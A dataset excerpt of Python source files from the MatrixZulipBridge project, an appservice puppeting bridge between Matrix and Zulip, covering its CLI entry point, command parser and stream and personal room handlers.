# import all rooms
for room_id in joined_rooms:
joined = {}
try:
config = await self.az.intent.get_account_data("zulip", room_id)
if "type" not in config or "user_id" not in config:
raise Exception("Invalid config")
cls = room_type_map.get(config["type"])
if not cls:
raise Exception("Unknown room type")
# refresh room members state
await self.az.intent.get_room_members(room_id)
joined = await self.az.state_store.get_member_profiles(
room_id, (Membership.JOIN,)
)
banned = await self.az.state_store.get_members(
room_id, (Membership.BAN,)
)
room = cls(
id=room_id,
user_id=config["user_id"],
serv=self,
members=joined.keys(),
bans=banned,
)
room.from_config(config)
# add to room displayname
for user_id, member in joined.items():
if member.displayname is not None:
room.displaynames[user_id] = member.displayname
# add to global puppet cache if it's a puppet
if self.is_puppet(user_id):
self._users[user_id] = member.displayname
# only add valid rooms to event handler
if room.is_valid():
self._rooms[room_id] = room
else:
room.cleanup()
raise Exception("Room validation failed after init")
if cls == ControlRoom and room.user_id == self.config["owner"]:
owner_control_open = True
except MNotFound:
logging.error(
f"Leaving room with no data: {room_id}. How did this happen?"
)
self.unregister_room(room_id)
await self.leave_room(room_id, joined.keys())
except Exception:
logging.exception(
f"Failed to reconfigure room {room_id} during init, leaving."
)
# regardless of safe mode, we ignore this room
self.unregister_room(room_id)
if unsafe_mode:
await self.leave_room(room_id, joined.keys())
logging.info("All valid rooms initialized, connecting organization rooms...")
wait = 1
for room in list(self._rooms.values()):
await room.post_init()
# check again if we're still valid
if not room.is_valid():
logging.debug(
f"Room {room.id} failed validation after post init, leaving."
)
self.unregister_room(room.id)
if unsafe_mode:
await self.leave_room(room.id, room.members)
continue
# connect organization rooms one by one, this may take a while
if isinstance(room, OrganizationRoom) and not room.connected:
def sync_connect(room):
asyncio.ensure_future(room.connect())
asyncio.get_running_loop().call_later(wait, sync_connect, room)
wait += 1
logging.info(
f"Init done with {wait-1} organizations connecting, bridge is now running!"
)
await self.push_bridge_state(BridgeStateEvent.UNCONFIGURED)
# late start WS to avoid getting transactions too early
if ws:
await ws.start()
if self.config["owner"] and not owner_control_open:
logging.info(f"Opening control room for owner {self.config['owner']}")
try:
room_id = await self.az.intent.create_room(
invitees=[self.config["owner"]],
custom_request_fields={"com.beeper.auto_join_invites": True},
)
room = ControlRoom(
id=room_id,
user_id=self.config["owner"],
serv=self,
members=[self.config["owner"]],
bans=[],
)
await room.save()
self.register_room(room)
await self.az.intent.join_room(room.id)
# show help on open
await room.show_help()
except Exception:
logging.error("Failed to create control room, huh")
await asyncio.Event().wait()
async def async_main():
parser = argparse.ArgumentParser(
prog=os.path.basename(sys.executable) + " -m " + __package__,
description=f"A puppeting Matrix - Zulip appservice bridge (v{__version__})",
formatter_class=argparse.ArgumentDefaultsHelpFormatter,
)
parser.add_argument(
"-v",
"--verbose",
help="log debug messages",
action="store_true",
default=argparse.SUPPRESS,
)
req = parser.add_mutually_exclusive_group(required=True)
req.add_argument(
"-c",
"--config",
help="registration YAML file path, must be writable if generating",
)
req.add_argument(
"--version",
action="store_true",
help="show bridge version",
default=argparse.SUPPRESS,
)
parser.add_argument(
"-l",
"--listen-address",
help="bridge listen address (default: as specified in url in config, 127.0.0.1 otherwise)",
)
parser.add_argument(
"-p",
"--listen-port",
help="bridge listen port (default: as specified in url in config, 28464 otherwise)",
type=int,
)
parser.add_argument("-u", "--uid", help="user id to run as", default=None)
parser.add_argument("-g", "--gid", help="group id to run as", default=None)
parser.add_argument(
"--generate",
action="store_true",
help="generate registration YAML for Matrix homeserver (Synapse)",
default=argparse.SUPPRESS,
)
parser.add_argument(
"--generate-compat",
action="store_true",
help="generate registration YAML for Matrix homeserver (Dendrite and Conduit)",
default=argparse.SUPPRESS,
)
parser.add_argument(
"--reset",
action="store_true",
help="reset ALL bridge configuration from homeserver and exit",
default=argparse.SUPPRESS,
)
parser.add_argument(
"--unsafe-mode",
action="store_true",
help="allow appservice to leave rooms on error",
)
parser.add_argument(
"-o",
"--owner",
help="set owner MXID (eg: @user:homeserver) or first talking local user will claim the bridge",
default=None,
)
parser.add_argument(
"homeserver",
nargs="?",
help="URL of Matrix homeserver",
default="http://localhost:8008",
)
args = parser.parse_args()
logging_level = logging.INFO
if "verbose" in args:
logging_level = logging.DEBUG
logging.basicConfig(stream=sys.stdout, level=logging_level)
try:
coloredlogs.install(logging_level)
except NameError:
pass
if "generate" in args or "generate_compat" in args:
letters = string.ascii_letters + string.digits
registration = {
"id": "zulipbridge",
"url": f"http://{args.listen_address or '127.0.0.1'}:{args.listen_port or 28464}",
"as_token": "".join(random.choice(letters) for i in range(64)),
"hs_token": "".join(random.choice(letters) for i in range(64)),
"rate_limited": False,
"sender_localpart": "zulipbridge",
"namespaces": {
"users": [{"regex": "@zulip_.*", "exclusive": True}],
"aliases": [],
"rooms": [],
},
}
if "generate_compat" in args:
registration["namespaces"]["users"].append(
{"regex": "@zulipbridge:.*", "exclusive": True}
)
if os.path.isfile(args.config):
logging.critical("Registration file already exists, not overwriting.")
sys.exit(1)
if args.config == "-":
yaml.dump(registration, sys.stdout)
else:
with open(args.config, "w", encoding="utf-8") as f:
yaml.dump(registration, f)
logging.info(f"Registration file generated and saved to {args.config}")
elif "reset" in args:
service = BridgeAppService()
logging.warning("Resetting will delete all bridge data, this is irreversible!")
await asyncio.sleep(3) # Gotta be careful
if input("Are you SURE you want to continue? [y/n] ").lower() == "y":
await service.reset(args.config, args.homeserver)
else:
logging.info("Not doing anything.")
sys.exit(0)
elif "version" in args:
logging.info(__version__)
else:
service = BridgeAppService()
service.load_reg(args.config)
if os.getuid() == 0:
if args.gid:
gid = grp.getgrnam(args.gid).gr_gid
os.setgid(gid)
os.setgroups([])
if args.uid:
uid = pwd.getpwnam(args.uid).pw_uid
os.setuid(uid)
os.umask(0o077)
listen_address = args.listen_address
listen_port = args.listen_port
if not listen_address:
listen_address = "127.0.0.1"
try:
url = urllib.parse.urlparse(service.registration["url"])
if url.hostname:
listen_address = url.hostname
except Exception:
pass
if not listen_port:
listen_port = 28464
try:
url = urllib.parse.urlparse(service.registration["url"])
if url.port:
listen_port = url.port
except Exception:
pass
await service.run(
listen_address, listen_port, args.homeserver, args.owner, args.unsafe_mode
)
def main():
asyncio.run(async_main())
if __name__ == "__main__":
try:
main()
except KeyboardInterrupt:
pass
| 35,705 | Python | .py | 868 | 29.428571 | 134 | 0.568976 | GearKite/MatrixZulipBridge | 8 | 1 | 3 | AGPL-3.0 | 9/5/2024, 10:48:09 PM (Europe/Amsterdam) |
2,286,580 | command_parse.py | GearKite_MatrixZulipBridge/matrixzulipbridge/command_parse.py | # MatrixZulipBridge - an appservice puppeting bridge for Matrix - Zulip
#
# Copyright (C) 2024 Emma Meijere <[email protected]>
#
# This program is free software: you can redistribute it and/or modify
# it under the terms of the GNU Affero General Public License as
# published by the Free Software Foundation, either version 3 of the
# License, or (at your option) any later version.
#
# This program is distributed in the hope that it will be useful,
# but WITHOUT ANY WARRANTY; without even the implied warranty of
# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the
# GNU Affero General Public License for more details.
#
# You should have received a copy of the GNU Affero General Public License
# along with this program. If not, see <https://www.gnu.org/licenses/>.
#
# Originally licensed under the MIT (Expat) license:
# <https://github.com/hifi/heisenbridge/blob/2532905f13835762870de55ba8a404fad6d62d81/LICENSE>.
#
# [This file includes modifications made by Emma Meijere]
#
#
import argparse
import shlex
from typing import Awaitable
class CommandParserFormatter(
argparse.ArgumentDefaultsHelpFormatter, argparse.RawTextHelpFormatter
):
pass
class CommandParserError(Exception):
pass
class CommandParser(argparse.ArgumentParser):
def __init__(self, *args, formatter_class=CommandParserFormatter, **kwargs):
super().__init__(*args, formatter_class=formatter_class, **kwargs)
@property
def short_description(self):
return self.description.split("\n")[0]
def error(self, message):
raise CommandParserError(message)
def print_usage(self, *args, **kwargs):
raise CommandParserError(self.format_usage())
def print_help(self, *args, **kwargs):
raise CommandParserError(self.format_help())
def exit(self, status=0, message=None):
pass
def split(text):
commands = []
sh_split = shlex.shlex(text, posix=True, punctuation_chars=";")
sh_split.commenters = ""
sh_split.wordchars += "!#$%&()*+,-./:<=>?@[\\]^_`{|}~"
args = []
for v in list(sh_split):
if v == ";":
commands.append(args)
args = []
else:
args.append(v)
if len(args) > 0:
commands.append(args)
return commands
class CommandManager:
_commands: dict[str, tuple[CommandParser, Awaitable]]
def __init__(self):
self._commands = {}
def register(self, cmd: CommandParser, func, aliases=None):
self._commands[cmd.prog] = (cmd, func)
if aliases is not None:
for alias in aliases:
self._commands[alias] = (cmd, func)
async def trigger_args(self, args, tail=None, allowed=None, forward=None):
command = args.pop(0).upper()
if allowed is not None and command not in allowed:
raise CommandParserError(f"Illegal command supplied: '{command}'")
if command in self._commands:
(cmd, func) = self._commands[command]
cmd_args = cmd.parse_args(args)
cmd_args._tail = tail
cmd_args._forward = forward
await func(cmd_args)
elif command == "HELP":
out = ["Following commands are supported:", ""]
for name, (cmd, func) in self._commands.items():
if cmd.prog == name:
out.append("\t{} - {}".format(cmd.prog, cmd.short_description))
out.append("")
out.append("To get more help, add -h to any command without arguments.")
raise CommandParserError("\n".join(out))
else:
raise CommandParserError(
'Unknown command "{}", type HELP for list'.format(command)
)
async def trigger(self, text, tail=None, allowed=None, forward=None):
for args in split(text):
await self.trigger_args(args, tail, allowed, forward)
tail = None
| 3,920 | Python | .py | 96 | 34 | 95 | 0.656217 | GearKite/MatrixZulipBridge | 8 | 1 | 3 | AGPL-3.0 | 9/5/2024, 10:48:09 PM (Europe/Amsterdam) |
2,286,581 | stream_room.py | GearKite_MatrixZulipBridge/matrixzulipbridge/stream_room.py | # MatrixZulipBridge - an appservice puppeting bridge for Matrix - Zulip
#
# Copyright (C) 2024 Emma Meijere <[email protected]>
#
# This program is free software: you can redistribute it and/or modify
# it under the terms of the GNU Affero General Public License as
# published by the Free Software Foundation, either version 3 of the
# License, or (at your option) any later version.
#
# This program is distributed in the hope that it will be useful,
# but WITHOUT ANY WARRANTY; without even the implied warranty of
# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the
# GNU Affero General Public License for more details.
#
# You should have received a copy of the GNU Affero General Public License
# along with this program. If not, see <https://www.gnu.org/licenses/>.
#
# Originally licensed under the MIT (Expat) license:
# <https://github.com/hifi/heisenbridge/blob/2532905f13835762870de55ba8a404fad6d62d81/LICENSE>.
#
# [This file includes modifications made by Emma Meijere]
#
#
import asyncio
import logging
from typing import TYPE_CHECKING, Optional
from mautrix.errors import MBadState
from mautrix.types import MessageType
from matrixzulipbridge.command_parse import CommandParser
from matrixzulipbridge.direct_room import DirectRoom
from matrixzulipbridge.room import InvalidConfigError
from matrixzulipbridge.under_organization_room import connected
if TYPE_CHECKING:
from mautrix.types import Event, MessageEvent, RoomID, UserID
from matrixzulipbridge.organization_room import OrganizationRoom
from matrixzulipbridge.types import ZulipStreamID, ZulipUserID
class StreamRoom(DirectRoom):
"""Puppeting room for Zulip stream."""
key: Optional[str]
member_sync: str
names_buffer: list[str]
use_displaynames = True
allow_notice = False
topic_sync = None
stream_id: "ZulipStreamID"
stream_name: Optional[str]
def init(self) -> None:
super().init()
self.key = None
self.autocmd = None
self.stream_id = None
self.stream_name = None
# for migration the class default is full
self.member_sync = "full"
cmd = CommandParser(
prog="SYNC",
description="override Zulip member sync type for this room",
epilog="Note: To force full sync after setting to full, use the NAMES command",
)
group = cmd.add_mutually_exclusive_group()
group.add_argument(
"--lazy",
help="set lazy sync, members are added when they talk",
action="store_true",
)
group.add_argument(
"--half",
help="set half sync, members are added when they join or talk",
action="store_true",
)
group.add_argument(
"--full",
help="set full sync, members are fully synchronized",
action="store_true",
)
group.add_argument(
"--off",
help="disable member sync completely, the bridge will relay all messages, may be useful during spam attacks",
action="store_true",
)
self.commands.register(cmd, self.cmd_sync)
cmd = CommandParser(
prog="UPGRADE",
description="Perform any potential bridge-side upgrades of the room",
)
cmd.add_argument(
"--undo", action="store_true", help="undo previously performed upgrade"
)
self.commands.register(cmd, self.cmd_upgrade)
cmd = CommandParser(
prog="DISPLAYNAMES",
description="enable or disable use of displaynames in relayed messages",
)
cmd.add_argument(
"--enable", dest="enabled", action="store_true", help="Enable displaynames"
)
cmd.add_argument(
"--disable",
dest="enabled",
action="store_false",
help="Disable displaynames (fallback to MXID)",
)
cmd.set_defaults(enabled=None)
self.commands.register(cmd, self.cmd_displaynames)
cmd = CommandParser(
prog="NOTICERELAY",
description="enable or disable relaying of Matrix notices to Zulip",
)
cmd.add_argument(
"--enable", dest="enabled", action="store_true", help="Enable notice relay"
)
cmd.add_argument(
"--disable",
dest="enabled",
action="store_false",
help="Disable notice relay",
)
cmd.set_defaults(enabled=None)
self.commands.register(cmd, self.cmd_noticerelay)
cmd = CommandParser(
prog="TOPIC",
description="show or set channel topic and configure sync mode",
)
cmd.add_argument(
"--sync",
choices=["off", "zulip", "matrix", "any"],
help="Topic sync targets, defaults to off",
)
cmd.add_argument("text", nargs="*", help="topic text if setting")
self.commands.register(cmd, self.cmd_topic)
self.mx_register("m.room.topic", self._on_mx_room_topic)
def is_valid(self) -> bool:
# we are valid as long as the appservice is in the room
if not self.in_room(self.serv.user_id):
return False
return True
@staticmethod
async def create(
organization: "OrganizationRoom",
name: str,
backfill: int = None,
room_id: "RoomID" = None,
) -> "StreamRoom":
logging.debug(
f"StreamRoom.create(organization='{organization.name}', name='{name}'"
)
organization.send_notice("Initializing room...")
room = StreamRoom(
None,
organization.user_id,
organization.serv,
[organization.user_id, organization.serv.user_id],
[],
)
room.name = name.lower()
room.organization = organization
room.organization_id = organization.id
room.max_backfill_amount = backfill or organization.max_backfill_amount
result = organization.zulip.get_stream_id(name)
room.stream_id = result.get("stream_id")
if not room.stream_id:
organization.send_notice(
f"A stream with the name {name} doesn't exist or we haven't been invited to it."
)
return None
room.organization = organization
room.organization_id = organization.id
# stamp global member sync setting at room creation time
room.member_sync = organization.serv.config["member_sync"]
organization.serv.register_room(room)
organization.rooms[room.stream_id] = room
if room_id is not None:
asyncio.ensure_future(room.join_existing_room(room_id))
else:
asyncio.ensure_future(room.create_mx(name))
return room
def from_config(self, config: dict) -> None:
super().from_config(config)
if "key" in config:
self.key = config["key"]
if "member_sync" in config:
self.member_sync = config["member_sync"]
if "stream_id" in config:
self.stream_id = config["stream_id"]
if self.stream_id is None:
raise InvalidConfigError("No stream_id key in config for ChannelRoom")
# initialize lazy members dict if sync is not off
if self.member_sync != "off":
if self.lazy_members is None:
self.lazy_members = {}
else:
self.lazy_members = None
if "use_displaynames" in config:
self.use_displaynames = config["use_displaynames"]
if "allow_notice" in config:
self.allow_notice = config["allow_notice"]
if "topic_sync" in config:
self.topic_sync = config["topic_sync"]
def to_config(self) -> dict:
return {
**(super().to_config()),
"key": self.key,
"member_sync": self.member_sync,
"stream_id": self.stream_id,
"use_displaynames": self.use_displaynames,
"allow_notice": self.allow_notice,
"topic_sync": self.topic_sync,
}
async def create_mx(self, name: str):
# handle !room names properly
visible_name = name
if visible_name.startswith("!"):
visible_name = "!" + visible_name[6:]
result = self.organization.zulip.call_endpoint(
url=f"/streams/{self.stream_id}", method="get"
)
if result["result"] != "success":
self.send_notice(f"Could not get stream by id: {result}")
return
restricted = None # Invite only
name_prefix = "🔒"
if not result["stream"]["invite_only"]:
# Allow space members to join
restricted = self.organization.space.id
name_prefix = "#"
self.id = await self.organization.serv.create_room(
f"{name_prefix}{visible_name} ({self.organization.name})",
"",
[self.organization.user_id],
permissions=self.organization.permissions,
restricted=restricted,
)
self.serv.register_room(self)
await self.save()
# start event queue now that we have an id
self._queue.start()
# attach to organization space
if self.organization.space:
await self.organization.space.attach(self.id)
@connected
async def _on_mx_room_topic(self, event: "Event") -> None:
if event.sender != self.serv.user_id and self.topic_sync in ["zulip", "any"]:
# topic = re.sub(r"[\r\n]", " ", event.content.topic)
raise NotImplementedError("Changing Zulip stream description")
@connected
async def on_mx_message(self, event: "MessageEvent") -> None:
sender = str(event.sender)
(name, server) = sender.split(":", 1)
# ignore self messages
if sender == self.serv.user_id:
return
# prevent re-sending federated messages back
if (
name.startswith("@" + self.serv.puppet_prefix)
and server == self.serv.server_name
):
return
sender = f"[{self._get_displayname(sender)}](https://matrix.to/#/{sender})"
if event.content.msgtype.is_media or event.content.msgtype in (
MessageType.EMOTE,
MessageType.TEXT,
MessageType.NOTICE,
):
await self._relay_message(event, sender)
await self.az.intent.send_receipt(event.room_id, event.event_id)
async def _relay_message(self, event: "MessageEvent", sender: str):
prefix = ""
client = self.organization.zulip_puppets.get(event.sender)
if not client:
client = self.organization.zulip
prefix = f"<{sender}> "
# try to find out if this was a reply
reply_to = None
if event.content.get_reply_to():
rel_event = event
# traverse back all edits
while rel_event.content.get_edit():
rel_event = await self.az.intent.get_event(
self.id, rel_event.content.get_edit()
)
# see if the original is a reply
if rel_event.content.get_reply_to():
reply_to = await self.az.intent.get_event(
self.id, rel_event.content.get_reply_to()
)
# Get topic (Matrix thread)
thread_id = event.content.get_thread_parent()
# Ignore messages outside a thread
if thread_id is None:
return
thread_event = await self.az.intent.get_event(self.id, thread_id)
topic = thread_event.content.body
# Save last thread event for old clients
self.thread_last_message[thread_id] = event.event_id
if thread_id in self.threads.inv:
topic = self.threads.inv[thread_id]
else:
thread_event = await self.az.intent.get_event(self.id, thread_id)
topic = thread_event.content.body
self.threads[topic] = thread_id
# keep track of the last message
self.last_messages[event.sender] = event
message = await self._process_event_content(
event, prefix, reply_to, topic=topic
)
request = {
"type": "stream",
"to": self.stream_id,
"topic": topic,
"content": message,
}
result = client.send_message(request)
if result["result"] != "success":
logging.error(f"Failed sending message to Zulip: {result['msg']}")
return
self.messages[str(result["id"])] = event.event_id
await self.save()
await self.save()
@connected
async def on_mx_ban(self, user_id: "UserID") -> None:
if not self.organization.relay_moderation:
return
zulip_user_id = self.organization.get_zulip_user_id_from_mxid(user_id)
if zulip_user_id is None:
return
if zulip_user_id in self.organization.deactivated_users:
return
result = self.organization.zulip.deactivate_user_by_id(zulip_user_id)
if result["result"] != "success":
self.organization.send_notice(
f"Unable to deactivate {user_id}: {result['msg']}"
)
return
self.organization.deactivated_users.add(zulip_user_id)
self.organization.delete_zulip_puppet(user_id)
rooms = list(self.organization.rooms.values()) + list(
self.organization.direct_rooms.values()
)
for room in rooms:
if room == self:
continue
if not isinstance(room, DirectRoom):
continue
if type(room) == DirectRoom: # pylint: disable=unidiomatic-typecheck
if zulip_user_id not in room.recipient_ids:
continue
await self.az.intent.ban_user(room.id, user_id, "account deactivated")
@connected
async def on_mx_unban(self, user_id: "UserID") -> None:
if not self.organization.relay_moderation:
return
zulip_user_id = self.organization.get_zulip_user_id_from_mxid(user_id)
if zulip_user_id is None:
return
if zulip_user_id not in self.organization.deactivated_users:
return
result = self.organization.zulip.reactivate_user_by_id(zulip_user_id)
if result["result"] != "success":
self.organization.send_notice(
f"Unable to reactivate {user_id}: {result['msg']}"
)
return
self.organization.deactivated_users.remove(zulip_user_id)
# we don't need to unban puppets
if self.serv.is_puppet(user_id):
return
for room in self.organization.rooms.values():
if not isinstance(room, DirectRoom):
continue
if room == self:
continue
try:
await self.az.intent.unban_user(
room.id, user_id, "unbanned in another room"
)
except MBadState:
pass
@connected
async def on_mx_leave(self, user_id: "UserID") -> None:
pass
async def cmd_displaynames(self, args) -> None:
if args.enabled is not None:
self.use_displaynames = args.enabled
await self.save()
self.send_notice(
f"Displaynames are {'enabled' if self.use_displaynames else 'disabled'}"
)
async def cmd_noticerelay(self, args) -> None:
if args.enabled is not None:
self.allow_notice = args.enabled
await self.save()
self.send_notice(
f"Notice relay is {'enabled' if self.allow_notice else 'disabled'}"
)
async def cmd_topic(self, args) -> None:
if args.sync is None:
self.organization.conn.topic(self.name, " ".join(args.text))
return
self.topic_sync = args.sync if args.sync != "off" else None
self.send_notice(
f"Topic sync is {self.topic_sync if self.topic_sync else 'off'}"
)
await self.save()
async def cmd_sync(self, args):
if args.lazy:
self.member_sync = "lazy"
await self.save()
elif args.half:
self.member_sync = "half"
await self.save()
elif args.full:
self.member_sync = "full"
await self.save()
elif args.off:
self.member_sync = "off"
# prevent anyone already in lazy list to be invited
self.lazy_members = None
await self.save()
self.send_notice(
f"Member sync is set to {self.member_sync}", forward=args._forward
)
def _add_puppet(self, zulip_user: dict):
mx_user_id = self.serv.get_mxid_from_zulip_user_id(
self.organization, zulip_user["user_id"]
)
self.ensure_zulip_user_id(self.organization, zulip_user=zulip_user)
self.join(mx_user_id, zulip_user["full_name"])
def _remove_puppet(self, user_id, reason=None):
if user_id == self.serv.user_id or user_id == self.user_id:
return
self.leave(user_id, reason)
def on_join(
self, zulip_user_id: "ZulipUserID" = None, zulip_user: dict = None
) -> None:
if zulip_user_id is None:
zulip_user_id = zulip_user["user_id"]
# we don't need to sync ourself
if zulip_user_id == self.organization.profile["user_id"]:
return
if zulip_user is None:
zulip_user = self.organization.get_zulip_user(zulip_user_id)
# ensure, append, invite and join
self._add_puppet(zulip_user)
mx_user_id = self.serv.get_mxid_from_zulip_user_id(
self.organization, zulip_user_id
)
self.join(mx_user_id, zulip_user["full_name"], lazy=False)
def on_part(self, zulip_user_id: "ZulipUserID") -> None:
# we don't need to sync ourself
if zulip_user_id == self.organization.profile["user_id"]:
return
mx_user_id = self.serv.get_mxid_from_zulip_user_id(
self.organization, zulip_user_id
)
self._remove_puppet(mx_user_id)
async def sync_zulip_members(self, subscribers: list["ZulipUserID"]):
to_remove = []
to_add = []
# always reset lazy list because it can be toggled on-the-fly
self.lazy_members = {} if self.member_sync != "off" else None
# build to_remove list from our own puppets
for member in self.members:
(name, server) = member.split(":", 1)
if (
name.startswith("@" + self.serv.puppet_prefix)
and server == self.serv.server_name
):
to_remove.append(member)
for zulip_user_id in subscribers:
# convert to mx id, check if we already have them
mx_user_id = self.serv.get_mxid_from_zulip_user_id(
self.organization, zulip_user_id
)
# make sure this user is not removed from room
if mx_user_id in to_remove:
to_remove.remove(mx_user_id)
continue
# ignore adding us here, only lazy join on echo allowed
if zulip_user_id == self.organization.profile["user_id"]:
continue
# if this user is not in room, add to invite list
if not self.in_room(mx_user_id):
to_add.append((mx_user_id, zulip_user_id))
# always put everyone in the room to lazy list if we have any member sync
if self.lazy_members is not None:
self.lazy_members[mx_user_id] = zulip_user_id
# never remove us or appservice
if self.serv.user_id in to_remove:
to_remove.remove(self.serv.user_id)
if self.user_id in to_remove:
to_remove.remove(self.user_id)
for mx_user_id, zulip_user_id in to_add:
zulip_user = self.organization.get_zulip_user(zulip_user_id)
self._add_puppet(zulip_user)
for mx_user_id in to_remove:
self._remove_puppet(mx_user_id, "Unsubcribed from stream")
async def backfill_messages(self):
if self.max_backfill_amount == 0:
return
request = {
"anchor": "newest",
"num_before": self.max_backfill_amount,
"num_after": 0,
"narrow": [
{"operator": "stream", "operand": self.stream_id},
],
}
result = self.organization.zulip.get_messages(request)
if result["result"] != "success":
logging.error(f"Failed getting Zulip messages: {result['msg']}")
return
for message in result["messages"]:
if str(message["id"]) in self.messages:
continue
if str(message["id"]) in self.organization.messages:
continue
self.organization.zulip_handler.backfill_message(message)
| 21,277 | Python | .py | 517 | 30.814313 | 121 | 0.595147 | GearKite/MatrixZulipBridge | 8 | 1 | 3 | AGPL-3.0 | 9/5/2024, 10:48:09 PM (Europe/Amsterdam) |
2,286,582 | personal_room.py | GearKite_MatrixZulipBridge/matrixzulipbridge/personal_room.py | # MatrixZulipBridge - an appservice puppeting bridge for Matrix - Zulip
#
# Copyright (C) 2024 Emma Meijere <[email protected]>
#
# This program is free software: you can redistribute it and/or modify
# it under the terms of the GNU Affero General Public License as
# published by the Free Software Foundation, either version 3 of the
# License, or (at your option) any later version.
#
# This program is distributed in the hope that it will be useful,
# but WITHOUT ANY WARRANTY; without even the implied warranty of
# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the
# GNU Affero General Public License for more details.
#
# You should have received a copy of the GNU Affero General Public License
# along with this program. If not, see <https://www.gnu.org/licenses/>.
#
# Originally licensed under the MIT (Expat) license:
# <https://github.com/hifi/heisenbridge/blob/2532905f13835762870de55ba8a404fad6d62d81/LICENSE>.
#
# [This file includes modifications made by Emma Meijere]
#
#
import asyncio
import logging
from typing import TYPE_CHECKING
from matrixzulipbridge import __version__
from matrixzulipbridge.command_parse import (
CommandManager,
CommandParser,
CommandParserError,
)
from matrixzulipbridge.direct_room import DirectRoom
from matrixzulipbridge.under_organization_room import UnderOrganizationRoom
if TYPE_CHECKING:
from mautrix.types import MessageEvent, UserID
from matrixzulipbridge.organization_room import OrganizationRoom
from matrixzulipbridge.types import ZulipUserID
class PersonalRoom(UnderOrganizationRoom):
commands: CommandManager
owner_mxid: "UserID"
owner_zulip_id: "ZulipUserID"
def init(self):
super().init()
self.owner_mxid = None
self.owner_zulip_id = None
self.commands = CommandManager()
cmd = CommandParser(
prog="LOGINZULIP",
description="enable Zulip puppeting and login",
)
cmd.add_argument("email", nargs="?", help="your Zulip account email")
cmd.add_argument("api_key", nargs="?", help="your Zulip account API key")
self.commands.register(cmd, self.cmd_loginzulip)
cmd = CommandParser(
prog="LOGOUTZULIP",
description="disable Zulip puppeting",
)
self.commands.register(cmd, self.cmd_logoutzulip)
cmd = CommandParser(
prog="DM",
description="create a direct message room",
)
cmd.add_argument("user", nargs="+", help="Zulip puppet or Matrix user IDs")
self.commands.register(cmd, self.cmd_dm)
self.mx_register("m.room.message", self.on_mx_message)
@staticmethod
async def create(
organization: "OrganizationRoom", user_mxid: "UserID"
) -> "PersonalRoom":
logging.debug(
f"PersonalRoom.create(organization='{organization.name}', user_mxid='{user_mxid}'"
)
room = PersonalRoom(
None,
user_mxid,
organization.serv,
[user_mxid, organization.serv.user_id],
[],
)
room.organization = organization
room.organization_id = organization.id
room.owner_mxid = user_mxid
organization.serv.register_room(room)
organization.rooms[user_mxid] = room
asyncio.ensure_future(room.create_mx(user_mxid))
return room
def from_config(self, config: dict) -> None:
super().from_config(config)
if "owner_mxid" in config:
self.owner_mxid = config["owner_mxid"]
if "owner_zulip_id" in config:
self.owner_zulip_id = config["owner_zulip_id"]
def to_config(self) -> dict:
return {
**(super().to_config()),
"owner_mxid": self.owner_mxid,
"owner_zulip_id": self.owner_zulip_id,
}
async def create_mx(self, user_mxid: "UserID") -> None:
if self.id is None:
self.id = await self.organization.serv.create_room(
f"{self.organization.name} (Personal room)",
f"Personal room for {self.organization.name}",
[user_mxid],
)
self.serv.register_room(self)
await self.save()
# start event queue now that we have an id
self._queue.start()
# attach to organization space
if self.organization.space:
await self.organization.space.attach(self.id)
def is_valid(self) -> bool:
if self.user_id is None:
return False
if len(self.members) != 2:
return False
if self.owner_mxid is None:
return False
return True
async def show_help(self):
self.send_notice_html(
f"<b>Howdy, stranger!</b> This is your personal room for {self.organization.name}."
)
try:
return await self.commands.trigger("HELP")
except CommandParserError as e:
return self.send_notice(str(e))
async def cmd_loginzulip(self, args):
if not args.email or not args.api_key:
self.send_notice("Specify an email address and API key to login.")
return
self.organization.zulip_puppet_login[self.user_id] = {
"email": args.email,
"api_key": args.api_key,
}
profile = await self.organization.login_zulip_puppet(
self.user_id, args.email, args.api_key
)
self.owner_zulip_id = profile["user_id"]
await self.save()
self.send_notice_html("Enabled Zulip puppeting and logged in")
async def cmd_logoutzulip(self, _args):
try:
del self.organization.zulip_puppet_login[self.user_id]
except KeyError:
self.send_notice("You haven't enabled Zulip puppeting")
return
try:
del self.organization.zulip_puppets[self.user_id]
except KeyError:
pass
self.send_notice("Logged out of Zulip")
async def cmd_dm(self, args):
users: list[str] = args.user
users.append(self.owner_mxid)
recipients = []
for user in users:
user_zulip_id = None
if user in self.organization.zulip_puppet_user_mxid.inverse:
user_zulip_id = self.organization.zulip_puppet_user_mxid.inverse[user]
elif self.serv.is_puppet(user):
user_zulip_id = self.organization.get_zulip_user_id_from_mxid(user)
else:
self.send_notice(f"Can't create DM with {user}")
return
zulip_user = self.organization.get_zulip_user(user_zulip_id)
if zulip_user is None or "user_id" not in zulip_user:
self.send_notice(f"Can't find Zulip user with ID {user_zulip_id}")
return
recipients.append(
{
"id": zulip_user["user_id"],
"full_name": zulip_user["full_name"],
}
)
recipient_ids = frozenset(user["id"] for user in recipients)
room = self.organization.direct_rooms.get(recipient_ids)
if room is not None:
self.send_notice(f"You already have a room with these users at {room.id}")
await room.check_if_nobody_left()
return
room = await DirectRoom.create(self.organization, recipients)
self.send_notice("Created a DM room and invited you to it.")
async def on_mx_message(self, event: "MessageEvent") -> bool:
if str(event.content.msgtype) != "m.text" or event.sender == self.serv.user_id:
return
# ignore edits
if event.content.get_edit():
return
try:
lines = event.content.body.split("\n")
command = lines.pop(0)
tail = "\n".join(lines) if len(lines) > 0 else None
await self.commands.trigger(command, tail)
except CommandParserError as e:
self.send_notice(str(e))
async def cmd_version(self, _args):
self.send_notice(f"zulipbridge v{__version__}")
| 8,171 | Python | .py | 200 | 31.655 | 95 | 0.626151 | GearKite/MatrixZulipBridge | 8 | 1 | 3 | AGPL-3.0 | 9/5/2024, 10:48:09 PM (Europe/Amsterdam) |
2,286,583 | __init__.py | GearKite_MatrixZulipBridge/matrixzulipbridge/__init__.py | # MatrixZulipBridge - an appservice puppeting bridge for Matrix - Zulip
#
# Copyright (C) 2024 Emma Meijere <[email protected]>
#
# This program is free software: you can redistribute it and/or modify
# it under the terms of the GNU Affero General Public License as
# published by the Free Software Foundation, either version 3 of the
# License, or (at your option) any later version.
#
# This program is distributed in the hope that it will be useful,
# but WITHOUT ANY WARRANTY; without even the implied warranty of
# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the
# GNU Affero General Public License for more details.
#
# You should have received a copy of the GNU Affero General Public License
# along with this program. If not, see <https://www.gnu.org/licenses/>.
#
# Originally licensed under the MIT (Expat) license:
